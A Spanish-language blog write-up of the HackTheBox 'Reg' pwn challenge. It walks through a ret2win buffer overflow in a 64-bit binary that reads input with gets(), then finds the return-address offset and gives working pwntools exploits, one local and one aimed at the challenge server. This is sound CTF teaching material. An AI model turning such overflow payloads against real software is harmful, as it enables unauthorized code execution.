<!DOCTYPE html><html lang="es" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="day-prompt" content="days ago"><meta name="hour-prompt" content="hours ago"><meta name="minute-prompt" content="minutes ago"><meta name="justnow-prompt" content="just now"><meta name="generator" content="Jekyll v4.2.1" /><meta property="og:title" content="Reg - Pwn Challenge (HTB) ❤" /><meta name="author" content="sha16" /><meta property="og:locale" content="es" /><meta name="description" content="Hola a tod@s! Hoy les traigo un nuevo post de binary exploitation." /><meta property="og:description" content="Hola a tod@s! Hoy les traigo un nuevo post de binary exploitation." /><link rel="canonical" href="https://sha-16.github.io/posts/Reg-HackTheBox-Pwn/" /><meta property="og:url" content="https://sha-16.github.io/posts/Reg-HackTheBox-Pwn/" /><meta property="og:site_name" content="sha16" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2023-09-17T00:00:00-03:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Reg - Pwn Challenge (HTB) ❤" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"sha16"},"description":"Hola a tod@s! Hoy les traigo un nuevo post de binary exploitation.","url":"https://sha-16.github.io/posts/Reg-HackTheBox-Pwn/","@type":"BlogPosting","headline":"Reg - Pwn Challenge (HTB) ❤","dateModified":"2023-09-27T22:48:54-03:00","datePublished":"2023-09-17T00:00:00-03:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://sha-16.github.io/posts/Reg-HackTheBox-Pwn/"},"@context":"https://schema.org"}</script><title>Reg - Pwn Challenge (HTB) ❤ | sha16</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="sha16"><meta name="application-name" content="sha16"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end" lang="en"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/img/sha-16.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">sha16</a></div><div class="site-subtitle font-italic">❤ Pentester / Red Team</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/sha-16" aria-label="github" class="order-3" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://www.youtube.com/channel/UCZrqUzohXiWRaJ7YdhVpZqA/videos" aria-label="youtube" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-youtube"></i> </a> <a href="https://twitch.tv/sha_16_/" aria-label="twitch" class="order-5" target="_blank" rel="noopener"> <i class="fab fa-twitch"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Reg - Pwn Challenge (HTB) ❤</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Reg - Pwn Challenge (HTB) ❤</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> sha16 </span> on <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Sun, Sep 17, 2023, 12:00 AM -0300" >Sep 17<i class="unloaded">2023-09-17T00:00:00-03:00</i> </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Wed, Sep 27, 2023, 10:48 PM -0300" >Sep 27<i class="unloaded">2023-09-27T22:48:54-03:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="739 words">4 min read</span></div></div><div class="post-content"><p>Hola a tod@s! Hoy les traigo un nuevo post de binary exploitation.</p><p>Este es un reto de pwning, del tipo <code class="language-plaintext highlighter-rouge">ret2win</code>, el cual implica explotar un <em>Buffer Overflow</em> con el objetivo hacer una llamado a una función que imprime la <code class="language-plaintext highlighter-rouge">flag</code> del desafío por pantalla.</p><p>Para comenzar, primeramente realizamos un análisis general del binario, checando sus protecciones:</p><p><img data-proofer-ignore data-src="/assets/img/htb/pwn/Reg/Untitled.png" alt="Untitled" /></p><p>Como se muestra en imagen, el binario es de <code class="language-plaintext highlighter-rouge">64 bits</code> y posee la protección <code class="language-plaintext highlighter-rouge">no-execute (NX)</code>, lo cual desde ya, significa que no podremos cargar código malicioso en el stack, mediante un <code class="language-plaintext highlighter-rouge">shellcode</code>.</p><p>Hecho esto, podemos empezar a entender la función y comportamiento del programa:</p><p><img data-proofer-ignore data-src="/assets/img/htb/pwn/Reg/Untitled%201.png" alt="Untitled" /></p><p>Al parecer es algo bastante sencillo, ya que sólo te pide el nombre y nada más.</p><p>En base a esto, comenzamos jugar y en lugar de colocar un nombre de <code class="language-plaintext highlighter-rouge">10 bytes</code>, metemos una <code class="language-plaintext highlighter-rouge">string</code> de <code class="language-plaintext highlighter-rouge">100 bytes</code>:</p><p><img data-proofer-ignore data-src="/assets/img/htb/pwn/Reg/Untitled%202.png" alt="Untitled" /></p><p>Como se muestra en imagen, el programa arroja un error <code class="language-plaintext highlighter-rouge">segmentation fault</code>, lo cual es más que suficiente para intuir que hemos desbordado el <em>buffer</em>.</p><p>Sabiendo esto, analizaremos el programa un poco más a fondo, aplicando reversing con Ghidra.</p><p>En la siguiente imagen, podemos observar que existe una función <code class="language-plaintext highlighter-rouge">main</code> la cual hace una llamada a <code class="language-plaintext highlighter-rouge">run</code>:</p><div class="language-c highlighter-rouge"><div class="code-header"> <span text-data=" C "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>

<span class="p">{</span>
  <span class="n">run</span><span class="p">();</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></table></code></div></div><p>La función <code class="language-plaintext highlighter-rouge">run</code> está encargada de recibir los datos del usuario por medio de la función <code class="language-plaintext highlighter-rouge">gets</code>, como se muestra a continuación:</p><div class="language-c highlighter-rouge"><div class="code-header"> <span text-data=" C "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="kt">void</span> <span class="nf">run</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>

<span class="p">{</span>
  <span class="kt">char</span> <span class="n">user_name</span> <span class="p">[</span><span class="mi">48</span><span class="p">];</span>
  
  <span class="n">initialize</span><span class="p">();</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Enter your name : "</span><span class="p">);</span>
  <span class="n">gets</span><span class="p">(</span><span class="n">user_name</span><span class="p">);</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">"Registered!"</span><span class="p">);</span>
  <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</pre></table></code></div></div><p>En este punto, ya podemos identificar dónde se acontece el <em>buffer overflow</em>.</p><p>Como se muestra en el código anterior, el programa usa la función <code class="language-plaintext highlighter-rouge">gets</code> para recibir el <code class="language-plaintext highlighter-rouge">input</code> del usuario. Dicha función es conocidamente vulnerable a ataques de desbordamiento de <em>buffer</em>, ya que esta no valida si el número de <code class="language-plaintext highlighter-rouge">bytes</code> introducidos por el usuario coinciden con aquellos que se reservaron para la variable, en base a esto el usuario puede comenzar a sobrescribir otras área de la memoria y controlar el flujo del programa:</p><p><img data-proofer-ignore data-src="/assets/img/htb/pwn/Reg/Untitled%203.png" alt="Untitled" /></p><p>Siguiendo con Ghidra, se logra identificar una función <code class="language-plaintext highlighter-rouge">winner</code> la cual no es llamada desde <code class="language-plaintext highlighter-rouge">main</code> o <code class="language-plaintext highlighter-rouge">run</code>:</p><p><img data-proofer-ignore data-src="/assets/img/htb/pwn/Reg/Untitled%204.png" alt="Untitled" /></p><p>Como se observa a continuación, el código de la función <code class="language-plaintext highlighter-rouge">winner</code> se encarga de imprimir el contenido del archivo <code class="language-plaintext highlighter-rouge">flag.txt</code> por pantalla:</p><div class="language-c highlighter-rouge"><div class="code-header"> <span text-data=" C "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre><span class="kt">void</span> <span class="nf">winner</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>

<span class="p">{</span>
  <span class="kt">char</span> <span class="n">flag_content</span> <span class="p">[</span><span class="mi">1032</span><span class="p">];</span>
  <span class="kt">FILE</span> <span class="o">*</span><span class="n">flag_file</span><span class="p">;</span>
  
  <span class="n">puts</span><span class="p">(</span><span class="s">"Congratulations!"</span><span class="p">);</span>
  <span class="n">flag_file</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">"flag.txt"</span><span class="p">,</span><span class="s">"r"</span><span class="p">);</span>
  <span class="n">fgets</span><span class="p">(</span><span class="n">flag_content</span><span class="p">,</span><span class="mi">1024</span><span class="p">,</span><span class="n">flag_file</span><span class="p">);</span>
  <span class="n">puts</span><span class="p">(</span><span class="n">flag_content</span><span class="p">);</span>
  <span class="n">fclose</span><span class="p">(</span><span class="n">flag_file</span><span class="p">);</span>
  <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</pre></table></code></div></div><p>Una vez analizado todo el flujo del programa, continuamos con la detección del <code class="language-plaintext highlighter-rouge">offset</code>, o sea la cantidad de bytes que tenemos que meter en el <em>overflow</em> antes de sobrescribir la dirección de retorno.</p><p>Para esto computamos una cadena <code class="language-plaintext highlighter-rouge">100 bytes</code>, utilizando <code class="language-plaintext highlighter-rouge">pattern create</code> en <code class="language-plaintext highlighter-rouge">gdb-gef</code>:</p><p><img data-proofer-ignore data-src="/assets/img/htb/pwn/Reg/Untitled%205.png" alt="Untitled" /></p><p>Al colocar esta cadena en el <code class="language-plaintext highlighter-rouge">name</code> provocamos que se sobrescriban los registros del programa, con lo que logramos detectar el <code class="language-plaintext highlighter-rouge">offset</code> correctamente:</p><p><img data-proofer-ignore data-src="/assets/img/htb/pwn/Reg/Untitled%206.png" alt="Untitled" /></p><p>Teniendo el <code class="language-plaintext highlighter-rouge">offset</code> en mano, sólo nos estaría faltando identificar la ubicación de memoria de la función <code class="language-plaintext highlighter-rouge">winner</code>, lo cual es logrado fácilmente con la herramienta <code class="language-plaintext highlighter-rouge">readelf</code>:</p><p><img data-proofer-ignore data-src="/assets/img/htb/pwn/Reg/Untitled%207.png" alt="Untitled" /></p><p>En base a todos los datos recopilados anteriormente, se construye el siguiente exploit, el cual se encarga de explotar el BoF de manera local para leer el contenido del archivo <code class="language-plaintext highlighter-rouge">flag.txt</code>:</p><div class="language-python highlighter-rouge"><div class="code-header"> <span text-data=" Python "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="n">process</span><span class="p">,</span> <span class="n">p64</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span>
    <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">'./reg'</span><span class="p">)</span>

    <span class="n">offset</span> <span class="o">=</span> <span class="mi">56</span>
    <span class="n">junk</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x41</span><span class="s">'</span> <span class="o">*</span> <span class="n">offset</span>
    
    <span class="n">winner_addr</span> <span class="o">=</span> <span class="mh">0x401206</span> <span class="c1"># winner() location
</span>
    <span class="c1"># ret2win payload
</span>    <span class="n">payload</span> <span class="o">=</span> <span class="n">junk</span> 
    <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">winner_addr</span><span class="p">)</span> 

    <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s">'Enter your name : '</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
    <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</pre></table></code></div></div><p>Como se puede observar en imagen, el BoF es explotado correctamente de forma local:</p><p><img data-proofer-ignore data-src="/assets/img/htb/pwn/Reg/Untitled%208.png" alt="Untitled" /></p><p>Para explotar el BoF de forma remota, sólo tendríamos que modificar el exploit, colocando el método <code class="language-plaintext highlighter-rouge">remote</code> en lugar de <code class="language-plaintext highlighter-rouge">process</code>, y así conectarnos al server de HTB:</p><div class="language-python highlighter-rouge"><div class="code-header"> <span text-data=" Python "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre><td class="rouge-code"><pre><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="n">remote</span><span class="p">,</span> <span class="n">p64</span><span class="p">,</span> <span class="n">log</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span>
    <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'206.189.27.45'</span><span class="p">,</span> <span class="mi">31721</span><span class="p">)</span> <span class="c1"># htb remote connection
</span>
    <span class="n">offset</span> <span class="o">=</span> <span class="mi">56</span>
    <span class="n">junk</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x41</span><span class="s">'</span> <span class="o">*</span> <span class="n">offset</span>

    <span class="c1"># winner() function location
</span>    <span class="n">winner_addr</span> <span class="o">=</span> <span class="mh">0x401206</span>

    <span class="c1"># ret2win payload
</span>    <span class="n">payload</span> <span class="o">=</span> <span class="n">junk</span> 
    <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">winner_addr</span><span class="p">)</span> 

    <span class="c1"># exploiting bof
</span>    <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s">'Enter your name : '</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
    <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</pre></table></code></div></div><p>Ya ejecutando el exploit, logramos obtener la <code class="language-plaintext highlighter-rouge">flag</code> del desafío correctamente:</p><p><img data-proofer-ignore data-src="/assets/img/htb/pwn/Reg/Untitled%209.png" alt="Untitled" /></p><h3 id="references">References</h3><ul><li>gets(7) - Linux Manual Page: https://man7.org/linux/man-pages/man3/gets.3.html</ul></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/linux/'>linux</a>, <a href='/categories/binary-exploitation/'>binary exploitation</a>, <a href='/categories/htb/'>htb</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/linux/" class="post-tag no-text-decoration" >linux</a> <a href="/tags/pwn/" class="post-tag no-text-decoration" >pwn</a> <a href="/tags/htb/" class="post-tag no-text-decoration" >htb</a> <a href="/tags/64-bit/" class="post-tag no-text-decoration" >64-bit</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://github.com/sha-16" data-toggle="tooltip" data-placement="top" title="github" target="_blank" rel="noopener" aria-label="github"> <i class="fa-fw fab fa-github"></i> </a> <a href="https://twitter.com/sha16_x" data-toggle="tooltip" data-placement="top" title="twitter" target="_blank" rel="noopener" aria-label="twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.youtube.com/channel/UCZrqUzohXiWRaJ7YdhVpZqA/videos" data-toggle="tooltip" data-placement="top" title="youtube" target="_blank" rel="noopener" aria-label="youtube"> <i class="fa-fw fab fa-youtube"></i> </a> <a href="https://twitch.tv/sha_16_/" data-toggle="tooltip" data-placement="top" title="twitch" target="_blank" rel="noopener" aria-label="twitch"> <i class="fa-fw fab fa-twitch"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/Resolute-HackTheBox-Machine/">Resolute - Write Up (HTB) ❤</a><li><a href="/posts/Forest-HackTheBox-Machine/">Forest - Write Up (HTB) ❤</a><li><a href="/posts/Sauna-HackTheBox-Machine/">Sauna - Write Up (HTB) ❤</a><li><a href="/posts/Active-HackTheBox-Machine/">Active - Write Up (HTB) ❤</a><li><a href="/posts/Blackfield-HackTheBox-Machine/">Blackfield - Write Up (HTB) ❤</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/64-bit/">64-bit</a> <a class="post-tag" href="/tags/active-directory/">Active Directory</a> <a class="post-tag" href="/tags/htb/">htb</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/as-rep-roasting/">AS-REP Roasting</a> <a class="post-tag" href="/tags/abusing-dcsync/">Abusing DCSync</a> <a class="post-tag" href="/tags/abusing-account-operators/">Abusing Account Operators</a> <a class="post-tag" href="/tags/abusing-backup-operators/">Abusing Backup Operators</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/BatComputer-HackTheBox-Pwn/"><div class="card-body"> <span class="timeago small" >Sep 10<i class="unloaded">2023-09-10T00:00:00-03:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Bat Computer - Pwn Challenge (HTB) ❤</h3><div class="text-muted small"><p> Hola a tod@s! Hoy les traigo un nuevo post de binary exploitation. En esta ocasión, les traigo la resolución de un BoF en un binario de 64-bit. El desafío como tal, consiste en un programa que te ...</p></div></div></a></div><div class="card"> <a href="/posts/Optimistic-HackTheBox-Pwn/"><div class="card-body"> <span class="timeago small" >Sep 17<i class="unloaded">2023-09-17T00:00:00-03:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Optimistic - Pwn Challenge (HTB) ❤</h3><div class="text-muted small"><p> Hola a tod@s! Hoy les traigo un nuevo post de binary exploitation. En esta ocasión, les traigo la resolución de un BoF en un binario de 64-bit. El desafío como tal, consiste en un programa que sim...</p></div></div></a></div><div class="card"> <a href="/posts/HTB-Console-HackTheBox-Pwn/"><div class="card-body"> <span class="timeago small" >Sep 23<i class="unloaded">2023-09-23T00:00:00-03:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HTB-Console - Pwn Challenge (HTB) ❤</h3><div class="text-muted small"><p> Hola a tod@s! Hoy les traigo un nuevo post de binary exploitation. Este es un reto de pwning, del tipo ret2system, similar al ret2libc, el cual implica explotar un Buffer Overflow con el objetivo ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Optimistic-HackTheBox-Pwn/" class="btn btn-outline-primary" prompt="Older"><p>Optimistic - Pwn Challenge (HTB) ❤</p></a> <a href="/posts/HTB-Console-HackTheBox-Pwn/" class="btn btn-outline-primary" prompt="Newer"><p>HTB-Console - Pwn Challenge (HTB) ❤</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://github.com/sha-16">Diego Osorio</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/64-bit/">64 bit</a> <a class="post-tag" href="/tags/active-directory/">Active Directory</a> <a class="post-tag" href="/tags/htb/">htb</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/as-rep-roasting/">AS REP Roasting</a> <a class="post-tag" href="/tags/abusing-dcsync/">Abusing DCSync</a> <a class="post-tag" href="/tags/abusing-account-operators/">Abusing Account Operators</a> <a class="post-tag" href="/tags/abusing-backup-operators/">Abusing Backup Operators</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); 